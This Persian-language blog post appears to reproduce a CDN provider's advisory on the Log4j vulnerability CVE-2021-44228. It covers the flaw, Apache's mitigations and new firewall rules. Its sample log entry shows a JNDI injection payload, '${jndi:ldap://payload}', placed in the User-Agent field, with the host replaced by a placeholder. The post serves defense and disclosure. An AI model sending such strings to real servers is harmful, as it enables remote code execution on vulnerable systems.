Srvice Desk PARS
فروشگاه محصولات استوک و لایسنس آنتی ویروس نود32 وب سایت پارس SDPARS.ir راه اندازی شد، جهت ورود به فروشگاه بر روی دکمه زیر کلیک کنید
در تاریخ ۹ دسامبر ۲۰۲۱ آسیب پذیری جدید و مهمی با نام CVE-2021-44228 برای کتاب خانهی Log4j اعلام و بلافاصله پس از آن، کدهای اکسپلوییت متعددی برای بررسی و سواستفاده از آن منتشر شد.
هنگامی که یک CVE جدید اعلام میشود از منظر شبکه توزیع محتوا (CDN) از دو جهت دارای اهمیت است.
این آسیب پذیری در کتابخانه Log4j که یک کتابخانه پردازش لاگ در جاوا به شمار میآید، یافت شده است و به دلیل پر استفاده بودن آن، به شکل گسترده در نرمافزارهای سازمانی که با جاوا توسعه داده شدهاند به کار میرود که اکنون میتواند هدف حملات مخرب قرار گیرد.
آسیب پذیری CVE-2021-44228 از آن رو اهمیت دارد که نرمافزارهای سازمانی شرکت Apache که به شکل گسترده برای پردازش در سازمانها مورد استفاده قرار میگیرند از این کتابخانه استفاده میکنند.
آسیب پذیری مذکور به حملهکننده این امکان را میدهد که از طریق ارسال یک Payload در درخواست های HTTP باعث اجرا شدن کدهای مخرب خود در سرویسهای داخلی که دارای این ضعف امنیتی هستند، شود.
این PayLoad میتواند در هر کدام از پارامترهای HTTP باشد. مانند:
با لاگ شدن هر کدام از این پارامترها که حاوی Payload مخرب باشند، دسترسی اجرای کد در اختیار حملهکننده قرار میگیرد.
اگر در هر یکی از مراحل پردازش درخواستهای HTTP یکی از پارامترهای Body, User Agent, URL, Referer را لاگ میکنید و یا از یکی از محصولات نوشته شده با جاوا مانند محصولات شرکت آپاچی استفاده میکنید، به احتمال بسیار زیاد تحت تاثیر این آسیبپذیری قرار میگیرید.
از نظر گستردگی و میزان تخریب، این آسیب پذیری جزو موارد بسیار شدید دسته بندی میشود.
نمونه یکی از درخواست های مخرب که در CDN لاگ شده است را میتوانید در تصویر زیر ببینید. در این UA میتوان Payload مخرب را مشاهده کرد (اطلاعات حساس آن مخفی شده است).
{ "timestamp": 1639293314.369, "uuid": "b111a870-f55f-4f3c-913b-7224a7b012ed", "method": "GET", "scheme": "https", "domain": "xxx", "uri": "/", "query_string": "", "referer": "", "ip": "1.2.3.4", "ua": "${jndi:ldap://payload}", "country": "IR", "isp": "NA", "asn": 1234, "content_type": "text/html; charset=utf-8", "status": 200, "server_ip": "1.2.3.4", "server_port": 443, "bytes_sent": 4489, "nbytes_received": [ ۰ ], "process_time": 0.001, "nupstream_time": [ ۰ ], "cache": "HIT", "request_id": "be9278e9a3a1a6f2ea9d3e0bc423c4d7", "node_id": "aaa", "upstream_addr": "" }
بر اساسی گزارشی که شرکت Apache منتشر کرد به کمک روشهای زیر میتوان در برابر این آسیبپذیری ایمن بود:
log4j2.formatMsgNoLookups=true
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
با توجه به اهمیت سرویسهای لاگ در محصولات، برای پردازش لاگها در قسمتهای متعددی از ابزارهای توسعه داده شده توسط آپاچی استفاده می شود:
با توجه به دستورالعملهای منتشر به وسیلهی آپاچی، این آسیبپذیریها در ساعات اولیه برطرف شدند.
برای کاربرانی که از سیستم WAF به منظور حفاظت در برابر حملات اینترنتی استفاده میکردند ۲ قانون جدید به پنل کاربری اضافه شد، که در ادامه قابل مشاهده است:
به دلیل وسیع بودن دامنه این حمله و اینکه سرویس WAF تنها در اختیار کاربران سازمانی CDN است، ما برای تمامی کاربران شبکه توزیع محتوا قانونی را به فایروال اضافه کردیم تا این درخواست های مخرب را مسدود کند.
اگر کاربر CDN هستید، لازم است برای ایمن ماندن در برابر این آسیب، دستورالعملهایی که در این مقاله به آن اشاره کردیم را به کار بگیرید.
برچسب ها :
تمامی حقوق مطالب برای پشتیبانی از راه دور پارس ارتباط محفوظ است و هرگونه کپی برداری بدون ذکر منبع ممنوع می باشد.